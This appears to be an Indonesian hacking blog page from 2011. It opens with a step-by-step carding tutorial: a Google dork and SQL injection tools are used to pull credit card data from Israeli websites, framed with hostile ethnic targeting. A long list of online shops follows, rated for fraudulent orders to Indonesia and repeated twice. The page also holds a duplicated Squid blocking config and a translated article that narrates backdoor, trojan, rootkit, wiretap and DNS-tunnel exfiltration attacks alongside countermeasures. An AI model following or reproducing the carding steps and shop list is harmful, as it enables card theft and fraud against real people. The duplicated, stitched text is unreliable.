kali ini saya membuat tutorial carding yg dimana target yg kuserang adalah masyarakat yahudi / israel
sebener nya ini tutor buat yg cupu kayak saya, ahahahaha
-------------------------------
tools yg di siapkan yaitu:
#.google extractor
#.sql exploiter versi brp aja
-------------------------------
-------------------------------
tahap tahap yg di lakukan 1
#buka google extractor, lalu masukan dork product.asp?id= site:il (harus il, kalo .id tak sumpahin jadi babi)
#trus scan, kalo sudah muncul link" yg kluar silah kan di klick kanan trus remove duplicate, biar ga keder
[Image: 24966_1256326613100_1377657451_30626880_2741170_n.jpg]
#lalu pindah ke TAB sql injector query builder
#masukan argumen tanda tanya(?)di insert arguments here
#kalo sudah klick Build Dan Scan
[Image: 24966_1256327293117_1377657451_30626881_7835278_n.jpg]
#trus ke tab berikut nya yaitu tab attack victim
#cari yg error result nya : unclosed quotation mark before the character ..... ga tau knp pokok nya ikutin aja jgn banyak tanya :p
#klick kanan copy url yg victim
[Image: 24966_1256330213190_1377657451_30626907_5067141_n.jpg]
tahap pemakaian sql exploiter2
#buka sql exploiter trus ke tab attacker for the hackable SHIT !!
#klik add manualy , masukan url yg victim tadi, trus paste (kadang tanda ' harus di hilangkan)
[Image: 24966_1256337133363_1377657451_30626936_8328987_n.jpg]
#kalo udah klick site info sampe info nya keluar
#kalo udah keluar maka tingal get table, maka akan muncul table" web tersebut, yg ku tandai warna biru
[Image: 24966_1256339053411_1377657451_30626940_4075654_n.jpg]
#pilih salah 1 yg ada di table tsbt, yg kira" dimana letak CC nya, trus get columb buat mengetahui colum apa aja di table tsb, tapi x ini aku ga ke table order
#kalo udah muncul smua colomb , drag smua colom trus get data
[Image: 24966_1256343293517_1377657451_30626944_1577372_n.jpg]
tutor ini di tulis dengan keyboard sendiri :p
credit : palembang hacker link dan kamu yg melihat tutor ini
aku ga ngajarin kejahatan lho, cuma buat info aja, kalo di tangkep interpol jgn bawa" nm saya :p
saya cuma manusia biasa yg bertugas sebagai panitia hari kiamat
Seftian Hacking,Networking,Programing
Welcome To My Territory Just For Study.!!!
Rabu, 15 Juni 2011
Info Online Shop
http://www.frontier-outfitters.com/ Toko accessories cowboy, bisa ke Indonesia
http://timeclub.com/ Toko jam yang asyik punya, bisa ke Indonesia (*Sudah banyak order yang berhasil !*)
http://kahuna-uk.com/ Toko bernuansa pantai, bisa ke Indonesia
http://kahuna.com.au/ Toko bernuansa pantai, bisa ke Indonesia
http://www.clixtore.de/ Toko di Jerman, lumayan masih pada bego operatornya
http://www.greatreplicas.com/ Toko replikasi jam, bisa ke Indonesia
http://www.window-shopping.de/ Toko di Jerman, bisa ke Indonesia
http://www.poljot.de/ Toko jam, bisa ke Indonesia
http://www.netzmarkt.de/ Toko di Jerman, dicoba enggak ada salahnya !
http://www.sportshop2000.de/ Toko di Jerman, bisa ke Indonesia
http://www.mercurycut.it/ Toko pisau di Italia, bisa ke Indonesia
http://www.agemont.it/ Toko pisau di Italia, bisa ke Indonesia
http://www.americanpuzzles.com/ Toko jam di Amerika, dicoba enggak ada salahnya !
http://www.switchblades.it/ Toko pisau di Italia, bisa ke Indonesia
http://www.festinashop.de/ Toko jam di Jerman, dicoba enggak ada salahnya !
http://www.sb-sportswear.com/ Toko pakaian olah raga di Italia, bisa ke Indonesia
http://sportswearhouse.co.uk/ Toko pakaian olah raga di Inggris
http://handbag.com/ Ada jam tangan
http://www.linkonline.co.uk/ Order televisi ? Disini tempatnya !
http://www.lazer.co.uk/ Mau order gameboy ? Disini bisa !
http://www.cd-wow.com/ Toko compact disc
http://www.cdnow.com/ Toko compact disc
http://bizrate.com/ Elektronik dan lainnya !
http://www.harrodsonline.com/ Toko punya si AL Fayed, bisa ke Indonesia
http://ashford.com/ Toko barang elektronik mewah, souvenir, perhiasan dan lainnya, bisa ke Indonesia
http://sawmall.com/ Direktori toko, tinggal pilih mau beli barang jenis apa
http://nike.com/ Toko resmi produk Nike
http://siemens.com/ Toko resmi produk Siemens
http://reef.com/ Toko perusahaan besar, kalo mau dihacking, silahkan….
http://radioclick.com/ Toko di Indonesia, sebaiknya jangan !
http://store.pragakhan.com/ Toko kaos, bisa ke Indonesia
http://outpost.com/ Dicoba enggak ada salahnya !
http://cirqueshop.com/ Bisa ke Indonesia
http://chips.com.au/ Bisa ke Indonesia
http://www.diamondringsusa.com/ Toko permata, bisa ke Indonesia
http://cdeals.com/ Bisa ke Indonesia
http//myerdirect.com.au Toko di Australia Bisa ke Indonesia
https://catalogue.maplin.co.uk/ Direktori toko, banyak yang bisa ke Indonesia
http://www.shopspy.co.uk/ Direktori toko di Inggris, banyak yang bisa kirim ke Indonesia
http://www.eshops.co.uk/ Bisa ke Indonesia, elektronik mewah….
http://www.phoneshop.uk.com/ Toko telepon di Inggris
http://www.shopmate.co.uk/ Toko di Inggris
http://www.7dayshop.com/ Bisa ke Indonesia
http://www.shoppingtrolley.net/mobile-phones-gsm.shtml Direktori toko handphone
http://www.directphones.co.uk/ Toko Handphone
http://www.findaroo.com/topoftheweb/ Link ke toko – toko lainnya
http://www.mobileshop.co.uk/ Toko Handphone di Inggris
http://www.webhideout.com/index2.html Link ke toko – toko lainnya
https://www.ecommercesoftware.co.uk/ Bisa ke luar Inggris
http://www.thefutureonline.net/ Bisa ke Indonesia
http://www.widget.co.uk/ Bisa ke Indonesia
http://www.ezcomputers.co.uk/ Bisa ke Indonesia
http://www.shoppingplanet.com/ Dicoba enggak ada salahnya !
http://www.hotbuyselectronics.com/ Bisa ke Indonesia
http://www.goroyalpc.com/ Bisa ke Indonesia
http://www.oakley.com/ Belum bisa ke Indonesia
http://www.surveillancesolutions.com/ Bisa ke Indonesia
https://www.diamond.com/ Bisa ke Indonesia
http://208.231.28.129/ Dicoba enggak ada salahnya
https://www.gold-jewelry.co.uk/ Bisa ke Indonesia
http://www.fashiontime.net/ Indonesia black list disini, cek aja !
http://www.xe.net/ Butuh pengkonversi mata uang ? Ini tempatnya (di pop-up windownya)
http://translator.dictionary.com/ Butuh penterjemah bahasa dari situs-situs shopping selain yang berbahasa Inggris ?
http://timeclub.com/ Toko jam yang asyik punya, bisa ke Indonesia (*Sudah banyak order yang berhasil !*)
http://kahuna-uk.com/ Toko bernuansa pantai, bisa ke Indonesia
http://kahuna.com.au/ Toko bernuansa pantai, bisa ke Indonesia
http://www.clixtore.de/ Toko di Jerman, lumayan masih pada bego operatornya
http://www.greatreplicas.com/ Toko replikasi jam, bisa ke Indonesia
http://www.window-shopping.de/ Toko di Jerman, bisa ke Indonesia
http://www.poljot.de/ Toko jam, bisa ke Indonesia
http://www.netzmarkt.de/ Toko di Jerman, dicoba enggak ada salahnya !
http://www.sportshop2000.de/ Toko di Jerman, bisa ke Indonesia
http://www.mercurycut.it/ Toko pisau di Italia, bisa ke Indonesia
http://www.agemont.it/ Toko pisau di Italia, bisa ke Indonesia
http://www.americanpuzzles.com/ Toko jam di Amerika, dicoba enggak ada salahnya !
http://www.switchblades.it/ Toko pisau di Italia, bisa ke Indonesia
http://www.festinashop.de/ Toko jam di Jerman, dicoba enggak ada salahnya !
http://www.sb-sportswear.com/ Toko pakaian olah raga di Italia, bisa ke Indonesia
http://sportswearhouse.co.uk/ Toko pakaian olah raga di Inggris
http://handbag.com/ Ada jam tangan
http://www.linkonline.co.uk/ Order televisi ? Disini tempatnya !
http://www.lazer.co.uk/ Mau order gameboy ? Disini bisa !
http://www.cd-wow.com/ Toko compact disc
http://www.cdnow.com/ Toko compact disc
http://bizrate.com/ Elektronik dan lainnya !
http://www.harrodsonline.com/ Toko punya si AL Fayed, bisa ke Indonesia
http://ashford.com/ Toko barang elektronik mewah, souvenir, perhiasan dan lainnya, bisa ke Indonesia
http://sawmall.com/ Direktori toko, tinggal pilih mau beli barang jenis apa
http://nike.com/ Toko resmi produk Nike
http://siemens.com/ Toko resmi produk Siemens
http://reef.com/ Toko perusahaan besar, kalo mau dihacking, silahkan….
http://radioclick.com/ Toko di Indonesia, sebaiknya jangan !
http://store.pragakhan.com/ Toko kaos, bisa ke Indonesia
http://outpost.com/ Dicoba enggak ada salahnya !
http://cirqueshop.com/ Bisa ke Indonesia
http://chips.com.au/ Bisa ke Indonesia
http://www.diamondringsusa.com/ Toko permata, bisa ke Indonesia
http://cdeals.com/ Bisa ke Indonesia
http//myerdirect.com.au Toko di Australia Bisa ke Indonesia
https://catalogue.maplin.co.uk/ Direktori toko, banyak yang bisa ke Indonesia
http://www.shopspy.co.uk/ Direktori toko di Inggris, banyak yang bisa kirim ke Indonesia
http://www.eshops.co.uk/ Bisa ke Indonesia, elektronik mewah….
http://www.phoneshop.uk.com/ Toko telepon di Inggris
http://www.shopmate.co.uk/ Toko di Inggris
http://www.7dayshop.com/ Bisa ke Indonesia
http://www.shoppingtrolley.net/mobile-phones-gsm.shtml Direktori toko handphone
http://www.directphones.co.uk/ Toko Handphone
http://www.findaroo.com/topoftheweb/ Link ke toko – toko lainnya
http://www.mobileshop.co.uk/ Toko Handphone di Inggris
http://www.webhideout.com/index2.html Link ke toko – toko lainnya
https://www.ecommercesoftware.co.uk/ Bisa ke luar Inggris
http://www.thefutureonline.net/ Bisa ke Indonesia
http://www.widget.co.uk/ Bisa ke Indonesia
http://www.ezcomputers.co.uk/ Bisa ke Indonesia
http://www.shoppingplanet.com/ Dicoba enggak ada salahnya !
http://www.hotbuyselectronics.com/ Bisa ke Indonesia
http://www.goroyalpc.com/ Bisa ke Indonesia
http://www.oakley.com/ Belum bisa ke Indonesia
http://www.surveillancesolutions.com/ Bisa ke Indonesia
https://www.diamond.com/ Bisa ke Indonesia
http://208.231.28.129/ Dicoba enggak ada salahnya
https://www.gold-jewelry.co.uk/ Bisa ke Indonesia
http://www.fashiontime.net/ Indonesia black list disini, cek aja !
http://www.xe.net/ Butuh pengkonversi mata uang ? Ini tempatnya (di pop-up windownya)
http://translator.dictionary.com/ Butuh penterjemah bahasa dari situs-situs shopping selain yang berbahasa Inggris ?
Senin, 13 Juni 2011
Blokir Jaringan
pertama buat dulu file dengan menggunakan editor kesayangan anda disini sy menggunakan
Code:
presiden@root#vim /etc/squid/bloksitus.txt
kemudian masukan situs2 yg akan kita blokir... umpamanya kita akan memblokir facebook maka masukan
.facebook.com <<< pake tanda titik karena kita juga akan memblok seluruh sub domainnya. setelah itu buka file konfigurasi squid yg berada di Code: /etc/squid/squid.conf dan masukan script dibawah ini Code: acl blokir url_regex "/etc/squid/bloksitus.txt" deny_info http://netheroes.org blokir acl waktu time MTWTFS 19:00-24:00 http_access allow blokir waktu http_access deny blokir ket: "deny_info http://netheroes.org blokir" maksudnya saat CLIENT mengakses situs yg berada dalam file yg dibuat tadi makan otomatis akan teredirect ke Site netheroes.org " acl waktu time MTWTFS 19:00-24:00" maksudnya CLIENT hanya boleh mengakses situs yg DI blok pada jam 19:00-24:00. script diatas udah saya coba dan berhasil...n saat ujicoba saya menggunakan opensuse 11.2 blom coba linux lain kk'...!!! Credit : NetHeroes.org
Code:
presiden@root#vim /etc/squid/bloksitus.txt
kemudian masukan situs2 yg akan kita blokir... umpamanya kita akan memblokir facebook maka masukan
.facebook.com <<< pake tanda titik karena kita juga akan memblok seluruh sub domainnya. setelah itu buka file konfigurasi squid yg berada di Code: /etc/squid/squid.conf dan masukan script dibawah ini Code: acl blokir url_regex "/etc/squid/bloksitus.txt" deny_info http://netheroes.org blokir acl waktu time MTWTFS 19:00-24:00 http_access allow blokir waktu http_access deny blokir ket: "deny_info http://netheroes.org blokir" maksudnya saat CLIENT mengakses situs yg berada dalam file yg dibuat tadi makan otomatis akan teredirect ke Site netheroes.org " acl waktu time MTWTFS 19:00-24:00" maksudnya CLIENT hanya boleh mengakses situs yg DI blok pada jam 19:00-24:00. script diatas udah saya coba dan berhasil...n saat ujicoba saya menggunakan opensuse 11.2 blom coba linux lain kk'...!!! Credit : NetHeroes.org
Mengungkap Rahasia Hacker
Menyelundupkan rootkit, membaca dokumen rahasia, dan menyadap
pembicaraan telepon dapat dilakukan dengan mudah. Dengan simulasi
serangan berikut ini, Anda akan lebih memahami serangan hacker dan
bagaimana cara mengantisipasinya.
Anda telah melindungi PC dengan firewall, Antivirus dan Service Pack?
Apabila sudah, berarti PC Anda pun menjadi lebih aman dari serangan virus dan hacker. Namun, PC belum benar-benar aman sebelum Anda meng-install patch terbaru. Oleh karena itu, jangan heran bila sewaktu-waktu PC Anda kedatangan ‘tamu tak diundang'. Meskipun Anda telah meng-install patch terakhir, tidak ada jaminan PC Anda aman 100%. Dengan 0-Day-Exploits (celah yang belum dikenal dan di-patch), hacker dapat menembus firewall yang tampaknya aman hanya dalam beberapa detik. Bermodalkan sebuah CD yang telah dimodifikasi, firewall paling aman sekalipun dapat ditembus. Team penulis telah mempraktekkannya dan mensimulasi serangan-serangan paling berbahaya dengan metode-metode terbaru hacker, termasuk rootkits. Beberapa rekan dipilih sebagai target dalam simulasi serangan tersebut.
Hasilnya mengejutkan: Apabila diinginkan, penyerang dapat mengambilalih kendali PC korban dengan mudah. Bagaimana cara kerjanya dan langkah preventif apa yang efektif melindungi PC Anda? Ikuti ulasannya berikut ini.
1. Memata-matai Korban
Aturan nomor satu untuk seorang penyusup atau hacker yang sukses adalah mengenal musuhnya dengan baik. Salah satu cara efektif mengenal korban adalah mengetahui perilakunya saat memakai web browser. Oleh karena 90% peselancar masih menggunakan Internet Explorer, tugas
ini menjadi lebih mudah. Yang lebih menarik, masih banyak perusahaan-perusahaan yang menggunakan program Microsoft yang telah ter-install di PC.
Hacker hanya perlu memancing korban ke sebuah website yang telah dipersiapkan untuk itu dan memanfaatkan kelemahan browser.
Serangan: Kami berencana mengambilalih kendali browser atau dengan kata lain mengambil alih PC melalui sebuah buffer overflow exploit. Untuk itu, identitas software korban harus diketahui. Hal ini dapat dilakukan dengan memancing korban untuk berselancar ke sebuah alamat online yang telah dirancang untuk dapat mengidentifikasi browser-nya. Dengan demikian nama browser dan versinya dapat diketahui. Semakin baru patch yang di-install pada browser, semakin kecil pula peluang browser tersebut untuk diserang. Oleh karena itu, identitas browser yang digunakan korban perlu diketahui. Untungnya, browser langsung mengirimkan informasi identitasnya tersebut dengan membacanya kemudian melalui protokol webserver. Versi filenya juga perlu diketahui, karena kebanyakan buffer overflow hanya berfungsi dengan versi-versi browser tertentu. Selanjutnya, kami menemukan sebuah 0-Day-Exploit serbaguna yang terdapat pada Internet Explorer 6. 0-Day-Exploit digunakan sebagai istilah bagi celah keamanan yang sangat baru dan belum memiliki patch khusus untuk memperbaikinya.
Kami memperoleh informasi tambahan dari hacker FrSIRT yang mendemonstrasikan celah keamanan 'Proof of Concept' tersebut. Ia memberi tahu di mana tepatnya celah dapat dimanfaatkan sehingga mempermudah untuk memulai sebuah serangan.
Pada contoh, cukup dengan menjalankan program kalkulator Windows, kami dapat menyusupkan sebuah backdoor ke dalam scr i pt-nya. Backdoor tersebut selanjutnya menjadi ‘pintu masuk’ tool-tool berbahaya lainnya ke dalam sistem. scr i pt backdoor yang dibutuhkan banyak tersedia di Internet, sehingga serangan dapat dilakukan dengan mudah melalui perintah copy dan paste layaknya seorang scr i pt-kiddie. Kini kami harus mengupayakan agar korban tersebut membuka website yang telah dipersiapkan. Oleh karena itu, kami mengirimkan e-mail dengan link khusus yang dianggap akan sangat menarik korban untuk mengkliknya. Dengan trik sederhana ini, serangan berhasil dilakukan tanpa masalah. Setelah korban mengklik link tersebut, Internet Explorer terbuka dan langsung crash. Hal ini menandakan sebuah backdoor telah sukses diinstall dalam PC korban.
Penangkal: Gunakan browser alternatif seperti Firefox atau Opera. Para pakar sekuriti memang telah menemukan celah keamanan berbahaya dalam browser-browser tersebut, tetapi celah tersebut lebih jarang dimanfaatkan hacker. Biasanya hacker lebih menyukai Internet Explorer karena lebih sering digunakan.
Perhatian: Jangan sembarang membuka link dalam e-mail. Perlakukan e-mail dari pengirim yang tidak Anda kenal dengan sangat hati-hati.
2. Menembus Firewall
Bagaimana melakukan penipuan dan penyamaran dengan sempurna penting bagi seorang spionase. Begitu pula halnya hacker yang ingin menyusupkan trojan dalam sebuah CD tanpa menimbulkan
kecurigaan siapapun. Dengan demikian, pengguna sama sekali tidak menyadari bahaya apa saja yang mengancam. Banyak yang tidak mengetahui bahwa sebuah CD demo dengan tampilan awal dan isi yang menarik bisa mengandung sebuah trojan.
Serangan: Kali ini, kami tidak menginstall sebuah backdoor untuk memasukkan trojan, melainkan memanfaatkan kapasitas media dan langsung mengemas trojan pada CD. Tool yang dipilih adalah trojan klasik ‘Back Orifice 2000’. Pertimbangannya karena trojan open source ini mudah dimodifikasi. Cukup dengan sedikit kode baru dan sebuah compiler lain, maka trojan ini sudah tidak dapat dideteksi oleh kebanyakan Antivirus. Agar trojan ter-install saat CD dimasukkan ke dalam drive, kami menggunakan sebuah CD demo yang sudah tersedia dan membuat rutin setup dengan tool gratis Nullsoft scr i ptable Install System (NSIS). Bedanya, kali ini instalasinya juga menyertakan sebuah trojan. Sebagai tambahan, kami melengkapi trojan tersebut dengan fungsi eksekusi otomatis. Dengan demikian, proses instalasi secara otomatis akan aktif saat CD dimasukkan ke dalam drive. Kini, korban pun hanya perlu memasukkan CD dan trojan dapat langsung beraksi. Dalam contoh, trojan tersebut dapat mencatat semua ketikan pada keyboard dan melaporkannya. Fungsi ini berguna bagi hacker yang ingin mengetahui perilaku korban dan data-data rahasia yang ada di PC-nya. Penangkal: Tidak ada penangkal sempurna untuk serangan seperti ini. Akan tetapi, hal yang berlaku pada e-mail juga berlaku pada CD yaitu jangan menginstall program yang tidak Anda kenal. Dalam prakteknya, hal tersebut sulit dilakukan. Cara yang lebih baik adalah memakai sebuah PC tes khusus, di mana trojan tidak menimbulkan kerusakan ke PC lainnya karena tidak terhubung ke jaringan.
3. Menjadi Tidak Terlihat.
Pakem ketiga dalam spionase adalah bagaimana melakukan penyusupan sekaligus tetap tidak terlihat. Dalam spionase PC ini berarti diperlukan sebuah rootkit. Untuk itu, sebuah backdoor sederhana harus diubah menjadi sebuah super trojan. Sekali masuk ke dalam sistem, trojan tersebut sulit ditemukan sehingga akan lebih sulit lagi untuk disingkirkan.
Rootkit paling terkenal untuk Windows adalah ‘FU Rootkit’. Rootkit ini menyembunyikan program perusak dalam Task Manager. Dengan demikian, trojan tidak lagi dapat dihentikan. Rootkit modern seperti ‘Beast’ bahkan lebih banyak lagi bersembunyi antara lain pada entri
registry, koneksi TCP/IP, dan file-file dalam hard disk.
Tanpa program khusus, seorang pengguna tingkat mahir sekalipun tidak dapat menemukan trojan tersebut, apalagi menyingkirkannya. Hal ini disebabkan rootkit membelokkan fungsi-fungsi Windows dan memanipulasi jawaban yang dibutuhkan oleh Antivirus biasa (lihat boks
Rootkit: Bahaya yang Tidak Tampak).
Serangan: kami memodifikasi ‘Back Orifice 2000’ dengan sebuah fungsi rootkit 'FU Rootkits'. Hal ini dapat dilakukan dengan mudah seperti halnya Anda mengintegrasikan sebuah plug-in ke Photoshop. Satu-satunya yang harus dilakukan adalah menginstall sebuah plugin rootkit dan
menentukan, file-file mana yang nantinya tidak terlihat oleh pengguna. Untuk tujuan tes, kami menyembunyikan trojan dan semua file yang dibuat, misalnya file protokol keylogger.
Penangkal: Untuk menghadapi teknik stealth seperti ini, hampir tidak ada yang dapat Anda lakukan. Sekali trojan berhasil ter-install pada sistem, maka trojan tersebut hanya dapat disingkirkan dengan tool khusus, seperti Rootkit Revealer dari Sysinternals.
Selain itu, Anda pun harus mengenal sistem PC Anda dengan baik untuk dapat menemukan trojan tersebut. Hal ini disebabkan, informasi seperti alamat penyimpanan dan fungsi-fungsi Windows harus benar-benar dipahami. Hal dilematis ditemui pada program yang tidak berbahaya,
seperti Daemon Tools. Tool gratis yang digunakan untuk membuat virtual drive ini sayangnya juga menggunakan teknik seperti rootkit untuk mengintegrasikan diri ke dalam sistem agar tidak terlihat.
ROOTKIT: BAHAYA YANG TIDAK TAMPAK
Cara Hacker Mengelabui Antivirus Rootkit ‘bercokol’ sangat jauh di dalam sistem operasi sehingga program-program keamanan umumnya sering tidak dapat mendeteksinya. Trojan canggih ini merupakan rangkaian tool yang dapat mencatat password, memberi akses kepada hacker,
merekam input keyboard, atau menyadap informasi dalam jaringan tanpa terlihat.
Spesialis keamanan F-Secure pernah memperingatkan bahaya rootkit yang masih menyimpan potensi besar untuk menyamarkan virus dan worm. Sekarang pun sudah ada worm yang menggunakan metode rootkit Sony (lihat boks Proteksi dengan Metode Hacker).
Kehadiran rootkit seringkali tidak terdeteksi oleh Antivirus. Berbeda dengan malware biasa yang bekerja pada level pengguna, rootkit mengaitkan dirinya ke dalam Windows API (Application Program Interface). Melalui API, program-program, termasuk Antivirus dan firewall, mengaktifkan fungsi-fungsi dasar sistem operasi, seperti akses ke hard disk atau registry.
Tahap selanjutnya, rootkit menghadang setiap permintaan dan menentukan data mana saja yang boleh dilihat oleh aplikasi keamanan. Apabila sebuah pembasmi virus mencari nama file rootkit, semua entri tersebut disaring dari jawaban yang diberikan sistem operasi. Dengan demikian trojan tidak ditemukan.
Cara menemukan rootkit: Untungnya, sebagian besar rootkit Windows masih belum sempurna dikembangkan. Misalnya trojan 'Slanret' yang dirancang sebagai systemdriver sehingga dapat terlihat pada Windows Safe Mode. Selain itu, Slanret pun sering menyebabkan crash.
Petunjuk-petunjuk lainnya yang dapat digunakan untuk mengetahui kehadiran rootkit antara lain kapasitas hard disk yang berkurang drastis, performa CPU yang turun drastis tanpa alasan jelas, dan koneksi Internet yang tidak dikenal. Para pengguna PC tingkat lanjut biasanya menggunakan tool Rootkit Revealer untuk menemukan API mana saja yang dibelokkan. Ia pun dapat membandingkan file-file pada hard disk dengan backup 'bersih' yang telah dibuat sebelumnya.
Cara menyingkirkan rootkit: Solusi ekstrim yang paling ampuh menyingkirkan rootkit atau tool hacker lainnya adalah mem-format hard disk dan meng-install sistem baru.
Sebagai langkah preventif, Anda pun harus mengganti semua password. Tool khusus untuk melacak dan menghapus rootkit seperti RootkitRevealer (http://www.sysinternals.com) atau BlackLight (http://www.fsecure.com) rumit digunakan dan lebih cocok bagi pengguna PC yang mahir. Tool sederhana untuk menyingkirkan berbagai varian rootkit, misalnya rootkit pada proteksi copy CD Audio Sony, sayangnya belum tersedia. Rootkit memiliki satu kesamaan dengan malware
biasa: PC dengan firewall dan Antivirus yang telah dipatch tidak dapat diinfeksi olehnya, dengan syarat pengguna tidak sembarangan membuka lampiran email mencurigakan dan tidak men-download filefile dari pembuat yang tidak dikenal.
Info: http://www.rootkit.com
PROTEKSI DENGAN METODE HACKER
Cara Perusahaan Menggunakan Trik Hacker Yang membeli CD audio Sony BMG, printer Xerox, atau sebuah game dari Blizzard Entertainment tidak menduga ada trik-trik hacker yang licik. Sayangnya, apa dilakukan perusahaan-perusahaan besar ini masih tergolong zona ‘kelabu’ dari sisi hukum.
- CD Audio Menelepon ke Rumah
Untuk memproteksi musiknya dari pembajakan, Sony BMG menggunakan sebuah proteksi copy yang tidak lazim. Apabila Anda ingin mendengar musiknya pada sebuah PC Windows, sebuah player yang termuat dalam CD perlu Anda install. Masalahnya, ada hal lain yang dirahasiakan
kepada pengguna. Bersama player, ter-install juga rootkit yang menyembunyikan file-file proteksi copy dari pembajak. Hal ini baru terungkap setelah seorang programmer Mark Russinovich dari Sysinternals mempublikasikannya. Proteksi copy yang disebut XCP ini menyebabkan sistem operasi tidak stabil dan membuat koneksi ke Internet.
Untuk menangkalnya, Blizzard membaca baris judul setiap program yang aktif dan meneruskannya ke game server. Bahayanya, jika saat itu sebuah jendela online banking terbuka, informasinya juga akan diteruskan.
- ID Tersembunyi pada Printer Xerox
Jangan pernah mencetak dokumen penting atau rahasia dengan printer berwarna Xerox. Masalahnya, pada setiap lembar cetakan juga tercetak code yang nyaris tidak terlihat. Temuan ini pertama kali dipublikasikan oleh lembaga swadaya EFF (Electronic Fronter Foundation) di AS. Kodenya berisi nomor seri dan nomor ID lainnya (tanggal, jam). Dengan demikian, tanpa nama pemiliknya pun sebuah hasil cetakan dapat diketahui asalnya. Kode berukuran beberapa mm yang terdiri atas titik-titik kuning kecil ini hanya dapat ditemukan, bila kita tahu di mana harus mencarinya. Selanjutnya kode tersebut perlu diperbesar 10x di bawah mikroskop.
Pihak mana yang mendapat manfaatnya tidak jelas. Spekulasinya mulai dari bagian support Xerox hingga dinas rahasia AS. Setelah EFF mempublikasikan informasi tersebut, Xerox langsung mengadakan konferensi pers. Mereka berdalih, metode tersebut dipakai untuk mencegah terjadinya praktek pemalsuan dokumen.
4. Menyadap Telepon
Mendengarkan semuanya dan tidak menceritakan apa pun adalah aturan keempat. Menyadap pembicaraan telepon sudah lama bukan lagi hak istimewa dinas rahasia. Apabila beberapa tahun lalu banyaknya celah dalam instalasi ISDN menarik para hacker, kini sasarannya beralih ke penyadapan telepon VoIP di Internet.
Serangan: Untuk tujuan demo, kami menjalankan tool ‘Cain & Abel’ yang ada di Internet. Tool ini bukan hanya memiliki fungsi hacking umum, seperti membongkar password, melainkan juga memungkinkan Anda mencatat website yang paling sering dikunjungi dan merekam pembicaraan
telepon sebagai file WAV. Syaratnya hanyalah hacker harus terhubung dengan jalur yang dilewati semua data.
Caranya adalah melalui sebuah koneksi (W)LAN atau sebuah trojan pada PC salah satu korban. Kami memulainya dengan sebuah serangan 'man-in-the-middle' dan menyadap aliran data korban. Untuk itu, trojan harus diperintahkan untuk mengirimkan datanya kepada CHIP terlebih dulu. Setelah sukses menghadangnya (menyadap), datanya langsung diteruskan ke PC yang dituju. Para korban (pengirim dan penerima) sendiri sama sekali tidak menyadari penyadapan tersebut.
Penangkal: Langkah termudah yang dapat langsung ditempuh adalah mengamankan LAN dengan filter alamat MAC dan menginstall Antivirus untuk menangkal trojan. Selain itu, kini tersedia solusi untuk mengenkripsi pembicaraan VoIP, seperti tool Zfone dari sang penemu PGP, Phil Zimmerman.
Masalahnya, hanya terletak pada aspek kompatibilitasnya. Tidak semua provider mendukung beberapa versi Zfone sehingga pengguna pun kehilangan privasinya.
5. Mengirimkan Data Keluar
Aturan terakhir dan terpenting adalah jangan ketahuan saat sedang memata-matai.
Meng-install sebuah trojan barulah setengah perjalanan karena tanpa koneksi balik, trojan tercanggih pun tidak ada gunanya. Oleh karena infrastruktur jaringan korban tidak jelas diketahui, kami harus bersiap menghadapi berbagai jenis firewall, terutama desktop firewall yang dapat memblokir setiap program aktif, dan sebuah IDS (Intrusion Detection System)
yang menganalisis isi setiap paket. Artinya, tidak cukup sekadar mengirim data dari PC. Informasinya juga harus tersamar dengan baik sehingga tidak mencolok bagi program keamanan.
Tool 'Back Orifice 2000' hampir tidak menyediakan plugin gratis yang tepat untuk tujuan tersebut. Satu-satunya plugin 'SCTP' memang mengenkripsi data dengan baik sehingga tidak ada pola yang dapat dikenali. Sayangnya metode ini juga masih berciri sebagai sebuah komunikasi
trojan. Bagi seorang hacker andal dengan ‘bekal’ metode penyelundupan data yang memadai,
firewall dapat saja ditembus.
Serangan: Cara yang paling digemari adalah dengan memanfaatkan protokol yang tampak tidak berbahaya seperti HTTP, SMTP atau DNS. Kami memilih metode DNS tunnel agar dapat melewati semua pengujian keamanan dalam jaringan tanpa menimbulkan kecurigaan. Artinya, informasi itu dikemas ke dalam paket Domain Name yang tidak mencolok. Paket jenis ini tidak diblokir oleh lebih dari 90% firewall karena protokol DNS mutlak diperlukan untuk menciptakan koneksi
Internet. Kami mengenkripsi sedikit informasinya dan mengirim sedikit mungkin paket agar IDS tidak mengetahuinya.
Sebuah pertukaran paket Domain Name yang berlebihan akan mencurigakan dan diketahui oleh IDS.
Untuk mengatasi proteksi desktop firewall, kami menggunakan jenis serangan injection. Artinya, kami memilih sebuah program yang dapat dijamin tidak diblokir oleh firewall, misalnya browser standar. Terserah, apakah browser tersebut adalah Internet Explorer atau Firefox.
Anda dengan mudah dapat mengetahuinya melalui registry Windows yang dibaca dengan sebuh trojan khusus. Kini, kami hanya perlu menunggu hingga korban yang tidak tahu-menahu tersebut mengaktifkan program dan meload-nya ke dalam memori (RAM). Saat hal tersebut dilakukan, trojan mengaitkan diri ke dalam proses yang tepat dan memanfaatkannya untuk tujuan tertentu.
Untuk mengetahui sukses tidaknya penyelundupan data, kami memerintahkan trojan untuk mengirimkan dokumen Word milik korban. Tentunya, tanpa diketahui pemiliknya dan firewall.
Penangkal: Persaingan antara perusahaan sekuriti dan hacker akan terlihat seperti ‘lingkaran setan’. Firewall, Antivirus, dan IDS memang semakin baik dalam mendeteksi dan memblokir berbagai serangan, tetapi serangan hacker pun semakin canggih. Semakin baik hacker mengenal sasarannya, semakin sukar ia diidentifikasi. Masalahnya, untuk setiap mekanisme proteksi
biasanya ada trik untuk mengatasinya. Oleh karena itu, vital artinya seorang administrator
untuk menjaga PC dan program-program keamanannya agar selalu aktual.
http://www.rootkit.com: Website dengan topik
rootkit yang paling populer. Di sana Anda akan mendapatkan banyak berita seputar rootkit dan informasi teknisnya.
http://www.bo2k.com: Website tool remote network administration yang dikembangkan berdasarkan trojan klasik Back Orifice.
http://www.securityfocus.com: Website ini menyediakan berita seputar keamanan PC terbaru dan ulasan detail dari pakarnya.
Tool-Tool Para Hacker
Antisipasi serangan hacker dengan mengetahui cara kerjanya. Berikut ini adalah tool-tool yang dapat digunakan untuk mengamankan jaringan Anda.
Nmap: Dengan port scanner ini, semua port yang terbuka dan alamat IP dalam jaringan dapat
diketahui. Dengan demikian, celah keamanan pun dapat ditutup.
Tips: Untuk memeriksa semua PC dan port dalam jaringan Anda, ketik perintah berikut ini.
nmap - v - sS- O 192.168.*.*
Apabila ada port yang kerap menjadi incaran hacker terbuka, tutup segera untuk mengindari serangan.
SwitchSniffer: PC yang terhubung dengan switch di jaringan menerima paket data yang ditujukan kepadanya. Dengan tool ini Anda dapat ‘membelokkan’paket tersebut.
